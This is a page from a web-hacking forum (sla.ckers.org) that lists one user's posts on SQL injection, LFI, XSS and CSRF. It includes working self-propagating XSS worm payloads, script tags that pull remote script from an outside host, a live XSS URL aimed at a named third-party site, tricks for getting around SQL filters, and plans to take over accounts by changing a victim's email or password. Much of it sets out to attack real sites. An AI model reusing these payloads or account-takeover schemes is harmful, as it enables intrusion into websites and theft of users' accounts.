Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 74
5 years ago
Spikeman
I'm exploiting a site with a similar LFI vulnerability. Magic_quotes is on, so it escapes the null-byte. I attempted the sled method, but the include isn't loaded and the rest of the page isn't loaded as well. Is there anyway around this?
Forum: SQL and Code Injection
6 years ago
Spikeman
Reiners Wrote: ------------------------------------------------------- > > However, if it was escaping quotes and not > backslashes '\"' should be able to break out of > the query. > > > and does this work? I'm not sure what you are > asking for because you already described the > protection and the workaround ... No, sorry I forgot to mention that esc
Forum: SQL and Code Injection
6 years ago
Spikeman
I've been trying to exploit a search function on an application that I know uses PHP and MySQL. What's strange is that quote characters seem to be escaped, but not backslashes. If I do a search for just a backslash it will return a string ending in '%'. From this I gather that the query is something like this: SELECT string FROM table LIKE "%$var%" Using a backslash seems to be
Forum: SQL and Code Injection
6 years ago
Spikeman
Isn't working for me.
Forum: XSS Info
6 years ago
Spikeman
So a polymorphic worm? That'd be cool. It'd be fun to code as well.
Forum: XSS Info
6 years ago
Spikeman
QuoteI once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem wa
Forum: XSS Info
6 years ago
Spikeman
One idea I toyed with once was set up an XSS worm with script hosted somewhere externally that you control. Let it propagate completely silently for a while. Once it is fairly widespread change the code to add the payload. The only flaw to this method is users may notice their browser accessing a domain they haven't seen before which will draw suspicion. One idea that is sort of similar that w
Forum: XSS Info
6 years ago
Spikeman
@rsnake: I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the pro
Forum: XSS Info
6 years ago
Spikeman
My entry (doesn't work with doctype, can someone explain why?): <form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src=" 154 bytes, it grows but the first 154 chars stay the same (so it could work with a limit of 154).
Forum: XSS Info
6 years ago
Spikeman
.mario, your 125 has to be tweaked to the following, 132 bytes to actually work. <form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button> It does pick up addition content put this wouldn't matter in this case as it would stay the same if truncated.
Forum: XSS Info
6 years ago
Spikeman
143 bytes: <form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script> Tested in Firefox and IE, quotes are added to make name="content" second time and after. It worked fine with content around it in my tests so the substring was unnecessary. Edit: I guess the added
Forum: XSS Info
6 years ago
Spikeman
Two questions: 1) It doesn't have to be transparent does it? 2) Does the length of the replicated worm matter? (Does it have to submit the same thing every time?)
Forum: XSS Info
6 years ago
Spikeman
You need to keep doing the ORDER BY x until you get an error. So you'd do ORDER BY 2, ORDER BY 3, ORDER BY 4, and if it erred on ORDER BY 5 you'd know it had 4 columns. Just fill the rest with nulls.
Forum: SQL and Code Injection
6 years ago
Spikeman
It's a union injection so I'm pretty sure I do need select, I tried sElecT and variants and it still didn't work. I am breaking out of a where clause so I could use blind injection techniques if I can't get select working.
Forum: SQL and Code Injection
6 years ago
Spikeman
I found an SQL injection in a website but when "SELECT" is in the URL as all the server returns a 403. Is there a way to obfuscate this? I know about using char() and concat() and such, but I doubt it will work with SELECT (going to try it now anyway).
Forum: SQL and Code Injection
7 years ago
Spikeman
PHP doesn't allow query stacking and the earlier query you posted is invalid. In shot, it's impossible (as far as I know) with a site that uses PHP (which I'm assuming this does).
Forum: SQL and Code Injection
7 years ago
Spikeman
http://www.soul-reply.net/tamashi/country.php?id=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E
Forum: Full Disclosure
7 years ago
Spikeman
That actually doesn't work, I get this: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select/**/password/**/from/**/user/**/where/**/id=1)/*', 'Mozilla/5.0 (Windows; ' at line 1 I think that it just parses the comments as nothing, not spaces. Is there some function like eval?
Forum: SQL and Code Injection
7 years ago
Spikeman
I found an SQL injection where I can inject in a query that logs views to the site, so my injection point is something like this (the server's running the latest MySQL I believe): h ttp://site.com/?','useragent here')/* This injects into an insert clause. Now to make this actually useful, I want to be able to do something like this: h ttp://site.com/?',SELECT password FROM users WHERE id=
Forum: SQL and Code Injection
7 years ago
Spikeman
There's no way to log in as a user by stealing their cookie unless you can spoof your IP and your user agent to be the same as theirs.
Forum: Full Disclosure
7 years ago
Spikeman
http://photobucket.com/images/0;url=HACKER%22http-equiv=refresh%3E Can't quite get it to work right yet. Using forward slashes break it. I tried to get it to redirect to a picture in my album, but it escapes the quote so it doesn't work right.
Forum: Full Disclosure
7 years ago
Spikeman
bubbles Wrote: ------------------------------------------------------- > Its stored in their cookie, so if you can steal > that you can get it. Only if they chose "Remember Me" though. You could use AJAX and have them send out one of those Invite My Friends to your email. That would get you their email probably. Both that and stealing their cookie assume you can find a hol
Forum: Full Disclosure
7 years ago
Spikeman
Not to mention MySpace needs a password to change email.. (yeah I've looked into it ;) Edit: And also a CAPTCHA if I'm not mistaken..
Forum: Full Disclosure
7 years ago
Spikeman
I while ago I was having the same issue and I recommended RSnake make http://ckers.org/s point to the Stallowned thing, and he did. So <script src=//ckers.org/s> maybe? Also, if you are able to inject more than one place on the page you could inject <script src=//ckers.org/s> in the first and the closing script tag in the second. I did this in a highscores table for some online game.
Forum: XSS Info
7 years ago
Spikeman
%0010000
Forum: OMG Ponies
7 years ago
Spikeman
Here's an interesting idea I had today: Code an open-source web site without security, for example a forum in PHP. Then provide the source, and have hackers (that's where you all come in) find exploits. Write a simple patch for every exploit that is found. Theoretically, in the end you would be left with a secure piece of software. Does this sound realistic? A good way to implement this would b
Forum: Projects
7 years ago
Spikeman
Well first of all, you don't filter XSS in any of the fields upon registration, as far as I'm aware. My username (and everything is) is "<script>alert('xss!')</script>".
Forum: Projects
7 years ago
Spikeman
I'm not sure if this is the right place to post this, but my buddy needs help executing a DNS Cache Poisoning attack on his employer's nameservers. Don't mistake this for a malicious attack! After scanning their DNS and finding that it's open to the internet as well as vulnerable to DNS Cache Poisoning and telling them, they said it wasn't a big problem. So he wants to prove that it is. I've been
Forum: Networking
7 years ago
Spikeman
The vector I'm using actually isn't a vulnerability in IPB, it's a vulnerability in a Javascript code used on forums from the free forum provider http://invisionfree.com/. It actually took me a while to find a site with the code on it because one of InvisionFree's servers crashed a little while back and most lost the code. But I'm sure there are other codes that would work. I ended up making a
Forum: CSRF and Session Info
7 years ago
Spikeman
I did just want to log in as them, but I guess you're right, IP spoofing seems to be a nearly impossible option, unless I got lucky. So I guess I'll work on a CSRF using XMLHTTPRequest. So what would be the best CSRF if I wanted to steal an account? One that changed their password and logged who it changed? One that changed their email to mine, requests a lost password, and then changes it back?
Forum: CSRF and Session Info
Pages: 123Next
Current Page: 1 of 3